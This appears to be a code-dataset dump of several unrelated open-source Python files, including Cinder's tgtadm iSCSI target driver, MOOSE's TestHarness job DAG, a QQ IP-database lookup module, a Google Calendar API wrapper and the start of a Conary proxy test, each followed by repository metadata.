t.blockRenamed.connect(self.blockRenamed)
t.changed.connect(self.changed)
self.type_table_map[type_name] = t
self.table_stack.addWidget(t)
return t
def setDefaultBlockType(self):
param = self.block.getParamInfo("type")
if param and param.value:
self.setBlockType(param.value)
elif self.block.types:
self.setBlockType(sorted(self.block.types.keys())[0])
def setBlockType(self, type_name):
if type_name not in self.block.types:
return
t = self.getOrCreateTypeTable(type_name)
t.updateWatchers()
self.combo.blockSignals(True)
self.combo.setCurrentText(type_name)
self.combo.blockSignals(False)
t.updateType(type_name)
current = self.table_stack.currentWidget()
self._syncUserParams(current, t)
self.table_stack.setCurrentWidget(t)
self.changed.emit()
def addUserParam(self, param):
t = self.table_stack.currentWidget()
t.addUserParam(param)
def setWatchedBlockList(self, path, children):
for i in range(self.table_stack.count()):
t = self.table_stack.widget(i)
t.setWatchedBlockList(path, children)
def updateWatchers(self):
for i in range(self.table_stack.count()):
t = self.table_stack.widget(i)
t.updateWatchers()
def getTable(self):
return self.table_stack.currentWidget()
def paramValue(self, name):
for i in range(self.table_stack.count()):
t = self.table_stack.widget(i)
if t.paramValue(name):
return t.paramValue(name)
| lgpl-2.1 | -7,038,259,173,053,225,000 | 32.532468 | 106 | 0.599923 | false |
eharney/cinder | cinder/volume/targets/tgt.py | 1 | 13042 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import textwrap
import time
from oslo_concurrency import processutils as putils
from oslo_log import log as logging
from oslo_utils import fileutils
from cinder import exception
from cinder import utils
from cinder.volume.targets import iscsi
LOG = logging.getLogger(__name__)
class TgtAdm(iscsi.ISCSITarget):
"""Target object for block storage devices.
Base class for target object, where target
is data transport mechanism (target) specific calls.
This includes things like create targets, attach, detach
etc.
"""
VOLUME_CONF = textwrap.dedent("""
<target %(name)s>
backing-store %(path)s
driver %(driver)s
%(chap_auth)s
%(target_flags)s
write-cache %(write_cache)s
</target>
""")
def _get_target(self, iqn):
(out, err) = utils.execute('tgt-admin', '--show', run_as_root=True)
lines = out.split('\n')
for line in lines:
if iqn in line:
parsed = line.split()
tid = parsed[1]
return tid[:-1]
return None
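    # Parsing note: the loop above appears to expect "tgt-admin --show" output
    # lines of the form "Target 1: <iqn>", so parsed[1] is "1:" and the
    # trailing colon is stripped to obtain the tid.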
def _verify_backing_lun(self, iqn, tid):
backing_lun = True
capture = False
target_info = []
(out, err) = utils.execute('tgt-admin', '--show', run_as_root=True)
lines = out.split('\n')
for line in lines:
if iqn in line and "Target %s" % tid in line:
capture = True
if capture:
target_info.append(line)
if iqn not in line and 'Target ' in line:
capture = False
if ' LUN: 1' not in target_info:
backing_lun = False
return backing_lun
def _recreate_backing_lun(self, iqn, tid, name, path):
LOG.warning('Attempting recreate of backing lun...')
# Since we think the most common case of this is a dev busy
# (create vol from snapshot) we're going to add a sleep here
# this will hopefully give things enough time to stabilize
# how long should we wait?? I have no idea, let's go big
# and error on the side of caution
time.sleep(10)
(out, err) = (None, None)
try:
(out, err) = utils.execute('tgtadm', '--lld', 'iscsi',
'--op', 'new', '--mode',
'logicalunit', '--tid',
tid, '--lun', '1', '-b',
path, run_as_root=True)
except putils.ProcessExecutionError as e:
LOG.error("Failed recovery attempt to create "
"iscsi backing lun for Volume "
"ID:%(vol_id)s: %(e)s",
{'vol_id': name, 'e': e})
finally:
LOG.debug('StdOut from recreate backing lun: %s', out)
LOG.debug('StdErr from recreate backing lun: %s', err)
def _get_iscsi_target(self, context, vol_id):
return 0
def _get_target_and_lun(self, context, volume):
lun = 1 # For tgtadm the controller is lun 0, dev starts at lun 1
iscsi_target = 0 # NOTE(jdg): Not used by tgtadm
return iscsi_target, lun
@utils.retry(putils.ProcessExecutionError)
def _do_tgt_update(self, name):
(out, err) = utils.execute('tgt-admin', '--update', name,
run_as_root=True)
LOG.debug("StdOut from tgt-admin --update: %s", out)
LOG.debug("StdErr from tgt-admin --update: %s", err)
@utils.retry(exception.NotFound)
def create_iscsi_target(self, name, tid, lun, path,
chap_auth=None, **kwargs):
# Note(jdg) tid and lun aren't used by TgtAdm but remain for
# compatibility
# NOTE(jdg): Remove this when we get to the bottom of bug: #1398078
# for now, since we intermittently hit target already exists we're
# adding some debug info to try and pinpoint what's going on
(out, err) = utils.execute('tgtadm',
'--lld',
'iscsi',
'--op',
'show',
'--mode',
'target',
run_as_root=True)
LOG.debug("Targets prior to update: %s", out)
fileutils.ensure_tree(self.volumes_dir)
vol_id = name.split(':')[1]
write_cache = self.configuration.get('iscsi_write_cache', 'on')
driver = self.iscsi_protocol
chap_str = ''
if chap_auth is not None:
chap_str = 'incominguser %s %s' % chap_auth
target_flags = self.configuration.get('iscsi_target_flags', '')
if target_flags:
target_flags = 'bsoflags ' + target_flags
volume_conf = self.VOLUME_CONF % {
'name': name, 'path': path, 'driver': driver,
'chap_auth': chap_str, 'target_flags': target_flags,
'write_cache': write_cache}
LOG.debug('Creating iscsi_target for Volume ID: %s', vol_id)
volumes_dir = self.volumes_dir
volume_path = os.path.join(volumes_dir, vol_id)
if os.path.exists(volume_path):
LOG.debug(('Persistence file already exists for volume, '
'found file at: %s'), volume_path)
utils.robust_file_write(volumes_dir, vol_id, volume_conf)
LOG.debug(('Created volume path %(vp)s,\n'
'content: %(vc)s'),
{'vp': volume_path, 'vc': volume_conf})
old_persist_file = None
old_name = kwargs.get('old_name', None)
if old_name is not None:
LOG.debug('Detected old persistence file for volume '
'%(vol)s at %(old_name)s',
{'vol': vol_id, 'old_name': old_name})
old_persist_file = os.path.join(volumes_dir, old_name)
try:
# With the persistent tgts we create them
# by creating the entry in the persist file
# and then doing an update to get the target
# created.
self._do_tgt_update(name)
except putils.ProcessExecutionError as e:
if "target already exists" in e.stderr:
# Adding the additional Warning message below for a clear
# ER marker (Ref bug: #1398078).
LOG.warning('Could not create target because '
'it already exists for volume: %s', vol_id)
LOG.debug('Exception was: %s', e)
else:
LOG.error("Failed to create iscsi target for Volume "
"ID: %(vol_id)s: %(e)s",
{'vol_id': vol_id, 'e': e})
# Don't forget to remove the persistent file we created
os.unlink(volume_path)
raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
# Grab targets list for debug
# Consider adding a check for lun 0 and 1 for tgtadm
# before considering this as valid
(out, err) = utils.execute('tgtadm',
'--lld',
'iscsi',
'--op',
'show',
'--mode',
'target',
run_as_root=True)
LOG.debug("Targets after update: %s", out)
iqn = '%s%s' % (self.iscsi_target_prefix, vol_id)
tid = self._get_target(iqn)
if tid is None:
LOG.warning("Failed to create iscsi target for Volume "
"ID: %(vol_id)s. It could be caused by problem "
"with concurrency. "
"Also please ensure your tgtd config "
"file contains 'include %(volumes_dir)s/*'",
{'vol_id': vol_id,
'volumes_dir': volumes_dir, })
raise exception.NotFound()
# NOTE(jdg): Sometimes we have some issues with the backing lun
# not being created, believe this is due to a device busy
# or something related, so we're going to add some code
# here that verifies the backing lun (lun 1) was created
# and we'll try and recreate it if it's not there
if not self._verify_backing_lun(iqn, tid):
try:
self._recreate_backing_lun(iqn, tid, name, path)
except putils.ProcessExecutionError:
os.unlink(volume_path)
raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
# Finally check once more and if no go, fail and punt
if not self._verify_backing_lun(iqn, tid):
os.unlink(volume_path)
raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
if old_persist_file is not None:
fileutils.delete_if_exists(old_persist_file)
return tid
def remove_iscsi_target(self, tid, lun, vol_id, vol_name, **kwargs):
LOG.info('Removing iscsi_target for Volume ID: %s', vol_id)
vol_uuid_file = vol_name
volume_path = os.path.join(self.volumes_dir, vol_uuid_file)
if not os.path.exists(volume_path):
LOG.warning('Volume path %s does not exist, '
'nothing to remove.', volume_path)
return
if os.path.isfile(volume_path):
iqn = '%s%s' % (self.iscsi_target_prefix,
vol_uuid_file)
else:
raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
try:
# NOTE(vish): --force is a workaround for bug:
# https://bugs.launchpad.net/cinder/+bug/1159948
utils.execute('tgt-admin',
'--force',
'--delete',
iqn,
run_as_root=True)
except putils.ProcessExecutionError as e:
non_fatal_errors = ("can't find the target",
"access control rule does not exist")
if any(error in e.stderr for error in non_fatal_errors):
LOG.warning("Failed target removal because target or "
"ACL's couldn't be found for iqn: %s.", iqn)
else:
LOG.error("Failed to remove iscsi target for Volume "
"ID: %(vol_id)s: %(e)s",
{'vol_id': vol_id, 'e': e})
raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
# NOTE(jdg): There's a bug in some versions of tgt that
# will sometimes fail silently when using the force flag
# https://bugs.launchpad.net/ubuntu/+source/tgt/+bug/1305343
# For now work-around by checking if the target was deleted,
# if it wasn't, try again without the force.
            # This will NOT do any good for the case of multiple sessions
            # which the force was added for, but it will however address
# the cases pointed out in bug:
# https://bugs.launchpad.net/cinder/+bug/1304122
if self._get_target(iqn):
try:
LOG.warning('Silent failure of target removal '
'detected, retry....')
utils.execute('tgt-admin',
'--delete',
iqn,
run_as_root=True)
except putils.ProcessExecutionError as e:
LOG.error("Failed to remove iscsi target for Volume "
"ID: %(vol_id)s: %(e)s",
{'vol_id': vol_id, 'e': e})
raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
# NOTE(jdg): This *should* be there still but incase
# it's not we don't care, so just ignore it if was
# somehow deleted between entry of this method
# and here
if os.path.exists(volume_path):
os.unlink(volume_path)
else:
LOG.debug('Volume path %s not found at end, '
'of remove_iscsi_target.', volume_path)
| apache-2.0 | 3,726,398,437,732,719,000 | 40.403175 | 78 | 0.523463 | false |
harterj/moose | python/TestHarness/JobDAG.py | 9 | 11349 | #* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
from .schedulers.Job import Job
from contrib import dag
import pyhit
import os
class JobDAG(object):
""" Class which builds a Job DAG for use by the Scheduler """
def __init__(self, options):
self.__job_dag = dag.DAG()
self.__parallel_scheduling = None
self.options = options
def _setParallel(self):
""" Read the test spec file and determine if parallel_scheduling is set. """
if self.__parallel_scheduling is not None:
return self.__parallel_scheduling
self.__parallel_scheduling = False
job = self.getJob()
if job:
# We only need a single tester so we know what spec file to load.
# TODO: would be nice to have access to this without needing tester.specs
tester = job[0].getTester()
root = pyhit.load(os.path.join(tester.specs['test_dir'], tester.specs['spec_file']))
self.__parallel_scheduling = root.children[0].get('parallel_scheduling', False)
return self.__parallel_scheduling
def canParallel(self):
""" Return bool whether or not this group runs in parallel """
return self._setParallel()
def createJobs(self, testers):
""" Return a usable Job DAG based on supplied list of tester objects """
# for each tester, instance a job and create a DAG node for that job
self.__name_to_job = {}
for tester in testers:
job = Job(tester, self, self.options)
name = job.getTestName()
if name not in self.__name_to_job:
self.__name_to_job[name] = job
else:
job.addCaveats('duplicate test')
job.setStatus(job.skip)
self.__job_dag.add_node(job)
return self._checkDAG()
def getDAG(self):
""" return the running DAG object """
return self.__job_dag
def getJobs(self):
""" Return a list of available jobs """
if (self.canParallel() or self.options.pbs) and not self.options.pedantic_checks:
return self.__job_dag.ind_nodes()
return self.getJob()
def getJob(self):
""" Return a single available job """
concurrent_jobs = self.__job_dag.ind_nodes()
if [x for x in concurrent_jobs if x.isHold()]:
return [[x for x in concurrent_jobs if x.isHold()][0]]
return []
def getJobsAndAdvance(self):
"""
return finished jobs, and remove them from the DAG, thus
advancing to the next set of jobs when called again.
"""
# handle any skipped dependencies
self._doSkippedDependencies()
next_jobs = set([])
for job in list(self.__job_dag.ind_nodes()):
if job.isFinished():
next_jobs.add(job)
self.__job_dag.delete_node(job)
next_jobs.update(self.getJobs())
return next_jobs
def removeAllDependencies(self):
""" Flatten current DAG so that it no longer contains any dependency information """
if self.__name_to_job and self.__job_dag.size():
tmp_job_dag = dag.DAG()
for job in self.__job_dag.topological_sort():
tmp_job_dag.add_node(job)
self.__job_dag = tmp_job_dag
return self.__job_dag
def _checkDAG(self):
""" perform some sanity checks on the current DAG """
if self.__job_dag.size():
self._doMakeDependencies()
self._doLast()
# If there are race conditions, then there may be more skipped jobs
if self._doRaceConditions():
self._doSkippedDependencies()
return self.__job_dag
def _addEdge(self, child, parent):
try:
self.__job_dag.add_edge(child, parent)
# Cyclic errors
except dag.DAGValidationError:
err_output = self._printDownstreams(parent)
err_output += ' %s <--> %s' % (parent.getTestName().split('.')[1],
child.getTestName().split('.')[1])
parent.setOutput('Cyclic dependency error!\n\t' + err_output)
parent.setStatus(parent.error, 'Cyclic or Invalid Dependency Detected!')
def _doLast(self):
for job in self.__job_dag.topological_sort():
if 'ALL' in job.getPrereqs():
for a_job in self.__job_dag.topological_sort():
if a_job != job and not a_job.isSkip():
if '.ALL' in a_job.getTestName():
a_job.setStatus(a_job.error, 'Test named ALL when "prereq = ALL" elsewhere in test spec file!')
self._addEdge(a_job, job)
self._doSkippedDependencies()
def _doMakeDependencies(self):
""" Setup dependencies within the current Job DAG """
for job in self.__job_dag.ind_nodes():
prereq_jobs = job.getPrereqs()
if prereq_jobs == ['ALL']:
prereq_jobs = []
for prereq_job in prereq_jobs:
try:
self.__name_to_job[prereq_job]
self._addEdge(self.__name_to_job[prereq_job], job)
# test file has invalid prereq set
except KeyError:
job.setStatus(job.error, 'unknown dependency')
def _hasDownStreamsWithFailures(self, job):
""" Return True if any dependents of job has previous failures """
for d_job in self.__job_dag.all_downstreams(job):
status, message, caveats = d_job.previousTesterStatus(self.options)
if status in d_job.job_status.getFailingStatuses():
return True
def _doPreviouslyFailed(self, job):
"""
Set up statuses for jobs contained within the DAG for use with failed-tests option
"""
tester = job.getTester()
status, message, caveats = job.previousTesterStatus(self.options)
# This job passed, but one of its dependents has not
if status == tester.success and self._hasDownStreamsWithFailures(job):
tester.addCaveats('re-running')
return
# This job was skipped, passed or silent
elif status in job.job_status.getSuccessStatuses():
tester.setStatus(tester.silent)
job.setStatus(job.finished)
# Remaining independent 'skipped' jobs we don't want to print output for
elif not job.getRunnable():
tester.setStatus(tester.silent)
job.setStatus(job.finished)
# Remaining jobs are failures of some sort. Append the previous result as a caveat.
if message:
tester.addCaveats('previous results: {}'.format(message))
def _doSkippedDependencies(self):
""" Determine which jobs in the DAG should be skipped """
for job in list(self.__job_dag.topological_sort()):
dep_jobs = set([])
if self.options.failed_tests:
self._doPreviouslyFailed(job)
if not job.getRunnable() or job.isFail() or job.isSkip():
job.setStatus(job.skip)
dep_jobs.update(self.__job_dag.all_downstreams(job))
# Remove parent dependency so it can launch individually
for p_job in self.__job_dag.predecessors(job):
self.__job_dag.delete_edge_if_exists(p_job, job)
for d_job in dep_jobs:
d_tester = d_job.getTester()
if job.isSilent() and not d_job.getRunnable():
d_tester.setStatus(d_tester.silent)
elif not self._skipPrereqs():
d_job.setStatus(d_job.skip)
d_job.addCaveats('skipped dependency')
self.__job_dag.delete_edge_if_exists(job, d_job)
def _doRaceConditions(self):
""" Check for race condition errors within in the DAG"""
# Build output_file in relation to job dictionary
output_to_job = {}
for job in self.__job_dag.topological_sort():
if job.getRunnable() and not job.isFinished():
for output_file in job.getOutputFiles():
output_to_job[output_file] = output_to_job.get(output_file, [])
output_to_job[output_file].append(job)
# Remove jobs which have accurate dependencies
for outfile, job_list in output_to_job.items():
for job in list(job_list):
for match_job in self.__job_dag.all_downstreams(job):
if match_job in job_list:
job_list.remove(match_job)
# Left over multiple items in job_list are problematic
for outfile, job_list in output_to_job.items():
# Same test has duplicate output files
if len(job_list) > 1 and len(set(job_list)) == 1:
job_list[0].setOutput('Duplicate output files:\n\t%s\n' % (outfile))
job_list[0].setStatus(job.error, 'DUPLICATE OUTFILES')
            # Multiple tests will clobber each other's output file
# Only check this with parallel_scheduling enabled because otherwise
# all of these jobs will be serialized
elif len(job_list) > 1 and self._setParallel():
for job in job_list:
job.setOutput('Output file will over write pre-existing output file:\n\t%s\n' % (outfile))
job.setStatus(job.error, 'OUTFILE RACE CONDITION')
def _skipPrereqs(self):
"""
Method to return boolean to skip dependency prerequisites checks.
"""
if (self.options.ignored_caveats
and ('all' in self.options.ignored_caveats
or 'prereq' in self.options.ignored_caveats)):
return True
def _printDownstreams(self, job):
"""
create a printable dependency chart of for supplied job
# TODO: It would be super cool to print the entire DAG
in this fashion.
"""
downstreams = self.__job_dag.all_downstreams(job)
cyclic_path = []
for d_job in downstreams:
cyclic_path.append('%s -->'% (d_job.getTestNameShort()))
return ' '.join(cyclic_path)
def printDAG(self):
""" Print the current structure of the DAG """
job_order = []
cloned_dag = self.__job_dag.clone()
while cloned_dag.size():
concurrent_jobs = cloned_dag.ind_nodes(cloned_dag.graph)
if len(concurrent_jobs) > 1:
job_order.extend([x.getTestNameShort() for x in concurrent_jobs])
else:
if job_order:
job_order.extend(['<--', concurrent_jobs[0].getTestNameShort()])
else:
job_order.append(concurrent_jobs[0].getTestNameShort())
for job in concurrent_jobs:
cloned_dag.delete_node(job)
print('\n###### JOB ORDER ######\n', ' '.join(job_order))
| lgpl-2.1 | -5,989,466,196,529,192,000 | 39.971119 | 123 | 0.575205 | false |
noogel/xyzStudyPython | python/qqwry/qq_ip_query.py | 1 | 9212 | #!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import os
import sys, _socket, mmap
from struct import unpack, pack
DataFileName = "qq_ip_database.Dat"
def _ip2ulong(ip):
'''ip(0.0.0.0) -> unsigned long'''
return unpack('>L', _socket.inet_aton(ip))[0]
def _ulong2ip(ip):
'''unsigned long -> ip(0.0.0.0)'''
return _socket.inet_ntoa(pack('>L', ip))
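# Round-trip sketch of the two helpers above (value assumes the usual
# big-endian packing done by inet_aton/inet_ntoa):
#   _ip2ulong('1.2.3.4')  -> 16909060  (0x01020304)
#   _ulong2ip(16909060)   -> '1.2.3.4'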
class QQIpQueryBase:
'''
    QQIpQueryBase provides the basic lookup functionality.
    Note that the returned country and area values are raw, undecoded strings:
    GB-encoded for the Simplified Chinese database and BIG5-encoded for the
    Traditional Chinese edition.
'''
class ipInfo(tuple):
'''
        Convenience class for printing IP information.
ipInfo((sip, eip, country, area)) -> ipInfo object
'''
def __str__(self):
return str(self[0]).ljust(16) + ' - ' + str(self[1]).rjust(16) + ' ' + self[2] + self[3]
def normalize(self):
'''
            Convert the IP addresses to dotted-decimal strings.
'''
return QQIpQueryBase.ipInfo((_ulong2ip(self[0]), _ulong2ip(self[1]), self[2], self[3]))
def __init__(self, dbfile):
'''
QQIpQueryBase(dbfile) -> QQIpQueryBase object
        dbfile is a file object for the database file.
'''
self.f = dbfile
self.f.seek(0)
        self.indexBaseOffset = unpack('<L', self.f.read(4))[0] # base offset of the index area
        self.Count = (unpack('<L', self.f.read(4))[0] - self.indexBaseOffset) / 7 # number of index entries - 1
def Lookup(self, ip):
'''
        x.Lookup(ip) -> (sip, eip, country, area)  Look up the record for ip.
        ip, sip and eip are dotted-decimal IP strings.
        sip and eip are the first and last IPs of the range that contains ip.
'''
return self.nLookup(_ip2ulong(ip))
def nLookup(self, ip):
'''
        x.nLookup(ip) -> (sip, eip, country, area)  Look up the record for ip.
        ip is an unsigned long IP address.
        Otherwise identical to x.Lookup(ip).
'''
si = 0
ei = self.Count
if ip < self._readIndex(si)[0]:
raise StandardError('IP NOT Found.')
elif ip >= self._readIndex(ei)[0]:
si = ei
else: # keep si <= ip < ei
while (si + 1) < ei:
mi = (si + ei) // 2
if self._readIndex(mi)[0] <= ip:
si = mi
else:
ei = mi
ipinfo = self[si]
if ip > ipinfo[1]:
raise StandardError('IP NOT Found.')
else:
return ipinfo
def __str__(self):
tmp = []
tmp.append('RecCount:')
tmp.append(str(len(self)))
tmp.append('\nVersion:')
tmp.extend(self[self.Count].normalize()[2:])
return ''.join(tmp)
def __len__(self):
return self.Count + 1
def __getitem__(self, key):
'''
x[key]
        If key is an integer, return the key-th record (counting from 0; note
        this differs from x.nLookup(ip)).
        If key is a dotted-decimal IP string, behave like x.Lookup(key).
'''
if type(key) == type(0):
if (key >= 0) and (key <= self.Count):
index = self._readIndex(key)
sip = index[0]
self.f.seek(index[1])
eip = unpack('<L', self.f.read(4))[0]
(country, area) = self._readRec()
return QQIpQueryBase.ipInfo((sip, eip, country, area))
else:
raise KeyError('INDEX OUT OF RANGE.')
elif type(key) == type(''):
try:
return self.Lookup(key).normalize()
except StandardError, e:
if e.message == 'IP NOT Found.':
raise KeyError('IP NOT Found.')
else:
raise e
else:
raise TypeError('WRONG KEY TYPE.')
def __iter__(self):
        '''Return an iterator (generator).'''
for i in range(0, len(self)):
yield self[i]
def _read3ByteOffset(self):
        '''_read3ByteOffset() -> unsigned long  Read a 3-byte offset from file f.'''
return unpack('<L', self.f.read(3) + '\x00')[0]
def _readCStr(self):
        '''x._readCStr() -> string  Read a '\0'-terminated string.'''
if self.f.tell() == 0:
return 'Unknown'
tmp = []
ch = self.f.read(1)
while ch != '\x00':
tmp.append(ch)
ch = self.f.read(1)
return ''.join(tmp)
def _readIndex(self, n):
        '''x._readIndex(n) -> (ip, offset)  Read the n-th index entry.'''
self.f.seek(self.indexBaseOffset + 7 * n)
return unpack('<LL', self.f.read(7) + '\x00')
def _readRec(self, onlyOne=False):
        '''x._readRec() -> (country, area)  Read the information of a record.'''
mode = unpack('B', self.f.read(1))[0]
if mode == 0x01:
rp = self._read3ByteOffset()
bp = self.f.tell()
self.f.seek(rp)
result = self._readRec(onlyOne)
self.f.seek(bp)
return result
elif mode == 0x02:
rp = self._read3ByteOffset()
bp = self.f.tell()
self.f.seek(rp)
result = self._readRec(True)
self.f.seek(bp)
if not onlyOne:
result.append(self._readRec(True)[0])
return result
else: # string
self.f.seek(-1, 1)
result = [self._readCStr()]
if not onlyOne:
result.append(self._readRec(True)[0])
return result
pass # End of class QQIpQueryBase
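# Record layout handled by _readRec() above: the first byte of a record is a
# mode flag. 0x01 means the whole record is redirected to a 3-byte offset
# elsewhere, 0x02 means the country string is redirected while the area
# follows inline, and any other value means the country string starts right
# here; the area is then obtained by a second, single-field _readRec() call.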
class QQIpQuery(QQIpQueryBase):
    '''QQIpQuery class.'''
def __init__(self, filename='qq_ip_database.Dat'):
'''QQIpQuery(filename) -> QQIpQuery object
        filename is the database file name.
'''
f = open(filename, 'rb')
QQIpQueryBase.__init__(self, f)
class MQQIpQuery(QQIpQueryBase):
    '''MQQIpQuery class.
    A QQIpQuery that keeps the database in memory; lookups are roughly twice as fast.
'''
def __init__(self, filename=DataFileName, dbfile=None):
'''MQQIpQuery(filename[,dbfile]) -> MQQIpQuery object
        filename is the database file name.
        A dbfile file object may be supplied directly instead, in which case filename is ignored.
'''
if dbfile == None:
try:
UPLOAD_DIR = os.path.dirname(os.path.realpath(__file__))
filename = '%s/%s' % (UPLOAD_DIR, filename)
dbf = open(filename, 'rb')
except IOError:
print "ERROR:", filename, "is not exist!"
sys.exit(1)
else:
dbf = dbfile
bp = dbf.tell()
dbf.seek(0)
QQIpQueryBase.__init__(self, mmap.mmap(dbf.fileno(), 0, access=1))
dbf.seek(bp)
def _readCStr(self):
        '''x._readCStr() -> string  Read a '\0'-terminated string.'''
pstart = self.f.tell()
if pstart == 0:
return 'unknown'
else:
pend = self.f.find('\x00', pstart)
if pend < 0:
raise StandardError('Fail To Read CStr.')
else:
self.f.seek(pend + 1)
return self.f[pstart:pend].decode('GBK').encode('UTF-8')
def _readIndex(self, n):
        '''x._readIndex(n) -> (ip, offset)  Read the n-th index entry.'''
startp = self.indexBaseOffset + 7 * n
return unpack('<LL', self.f[startp:startp + 7] + '\x00')
# def get_ip_list(ip_list):
# try:
# Q = MQQIpQuery()
# results = []
#
# print ip_list
# for item in ip_list:
# address = str(item['address'])
# count = item['count']
# result = {}
# result['address'] = address
# result['region'] = ''.join(Q[address][2:])
# result['type'] = ''.join(Q[address][3:])
# result['count'] = count
# print "result:", result
# results.append(result)
# print results
# return results
# except Exception, err:
# print err
# return None
if __name__ == '__main__':
try:
        Q = MQQIpQuery() # the database file is ./qq_ip_database.Dat
if len(sys.argv) == 1:
print Q
if len(sys.argv) == 2:
            if sys.argv[1] == '-': # a single "-" argument: read the IP from standard input
print ''.join(Q[raw_input()][2:])
            elif sys.argv[1] in ('all', '-a', '-all'): # example of iterating over every record
for i in Q:
print i.normalize()
            else: # a single IP argument: print only brief information
print ''.join(Q[sys.argv[1]][2:]).decode("utf-8")
else:
for i in sys.argv[1:]:
print Q[i]
except StandardError, e:
if e.message != '':
print e.message
else:
raise e
finally:
pass
| apache-2.0 | 2,556,463,129,593,330,700 | 29.101449 | 100 | 0.463653 | false |
felixb/v2gcalendar | v2gcalendar/calendar_service.py | 1 | 3566 | __author__ = 'flx'
from apiclient.discovery import build
import httplib2
from oauth2client import tools
from oauth2client.client import OAuth2WebServerFlow
from oauth2client.file import Storage
from oauth2client.tools import run_flow
# For this example, the client id and client secret are command-line arguments.
client_id = \
'826222712854-das8sdv4veehjje2o4e45sbvnrd8fi5n.apps.googleusercontent.com'
client_secret = 'CKBI_J4aE7QaEWLTxTyjGF-u'
# The scope URL for read/write access to a user's calendar data
scope = 'https://www.googleapis.com/auth/calendar'
# Create a flow object. This object holds the client_id, client_secret, and
# scope. It assists with OAuth 2.0 steps to get user authorization and
# credentials.
flow = OAuth2WebServerFlow(client_id, client_secret, scope)
class CalendarService:
def __init__(self):
self._service = None
self.init_service()
def init_service(self):
if self._service:
return
storage = Storage('credentials.dat')
credentials = storage.get()
if not credentials or credentials.invalid:
parser = tools.argparser
flags = parser.parse_args([])
credentials = run_flow(flow, storage, flags)
http = httplib2.Http()
http = credentials.authorize(http)
self._service = build('calendar', 'v3', http=http)
def get_calendars(self):
result = []
request = self._service.calendarList().list()
while request:
response = request.execute()
for calendar in response.get('items', []):
result.append(calendar)
request = self._service.calendarList().list_next(request, response)
return result
def find_calendar(self, name):
calendars = self.get_calendars()
for calendar in calendars:
if calendar['summary'] == name:
return calendar['id']
def clear(self, calendar_id):
request = self._service.calendars().clear(calendarId=calendar_id)
result = request.execute()
return result
def get_events(self, calendar_id, show_deleted=False):
results = []
request = self._service.events().list(calendarId=calendar_id,
showDeleted=show_deleted)
while request:
response = request.execute()
for event in response.get('items', []):
results.append(event)
request = self._service.events().list_next(request, response)
return results
def add_event(self, calendar_id, event):
response = self._service.events().insert(calendarId=calendar_id,
body=event,
sendNotifications=False)\
.execute()
return response
def update_event(self, calendar_id, event):
response = self._service.events().update(calendarId=calendar_id,
eventId=event['id'],
body=event,
sendNotifications=False)\
.execute()
return response
def delete_event(self, calendar_id, event_id):
response = self._service.events().delete(calendarId=calendar_id,
eventId=event_id,
sendNotifications=False)\
.execute()
return response
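if __name__ == '__main__':
    # Minimal usage sketch (assumptions: OAuth credentials can be obtained
    # interactively into credentials.dat, and a calendar named 'Test' exists;
    # adjust the name to your own account).
    service = CalendarService()
    calendar_id = service.find_calendar('Test')
    if calendar_id:
        for event in service.get_events(calendar_id):
            print(event.get('summary'))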
| apache-2.0 | -2,096,562,204,030,105,600 | 35.387755 | 79 | 0.579641 | false |
sassoftware/conary | conary_test/repositorytest/netrepostest/proxytest.py | 1 | 13556 | #
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from testrunner import testcase, testhelp
from testutils import mock
from testutils.servers import memcache_server
import copy
import os
from conary_test import rephelp
from conary import conaryclient
from conary import trove
from conary.files import ThawFile
from conary.repository import errors
from conary.repository.netrepos import proxy as netreposproxy
from conary.repository.netrepos import netserver
from conary.repository.netrepos.auth_tokens import AuthToken
def runproxy(**params):
def deco(fn):
def dorunproxy(obj, *args, **kwargs):
if 'CONARY_PROXY' in os.environ:
raise testhelp.SkipTestException("testInjectedEntitlements doesn't run with a proxy already running")
memcache = None
if params.pop('memcache', False):
memcache = memcache_server.MemcacheServer()
memcache.start()
params['cacheLocation'] = memcache.getHostPort()
proxy = obj.getConaryProxy(**params)
obj.stopRepository(1)
obj.openRepository(1, useSSL = True, forceSSL = True)
cfg = copy.deepcopy(obj.cfg)
proxy.addToConfig(cfg)
client = conaryclient.ConaryClient(cfg)
repos = client.getRepos()
proxy.start()
try:
fn(obj, repos, *args, **kwargs)
finally:
proxy.stop()
if memcache:
memcache.stop()
server = obj.servers.getServer(1)
if server is not None:
server.reset()
obj.stopRepository(1)
dorunproxy.func_name = fn.func_name
return dorunproxy
return deco
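# Usage note: a test decorated with @runproxy(...) receives, as its second
# argument, a repository client that talks through a freshly started Conary
# proxy; the keyword arguments (e.g. entitlements, users, memcache) configure
# that proxy, as the decorated tests below demonstrate.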
class ProxyUnitTest(testcase.TestCaseWithWorkDir):
def testGetChangeSet(self):
# Now mock ChangesetCache, to log things
origChangesetCache = netreposproxy.ChangesetCache
lockLogFile = os.path.join(self.workDir, "locks.log")
class MockChangesetCache(origChangesetCache):
llf = file(lockLogFile, "a")
def get(slf, key, shouldLock = True):
csPath = origChangesetCache.hashKey(slf, key)
ret = origChangesetCache.get(slf, key, shouldLock=shouldLock)
if shouldLock and ret is None:
slf.llf.write("Lock acquired for %s\n" % csPath)
self.assertTrue(os.path.exists(csPath + '.lck'))
return ret
def set(slf, key, value):
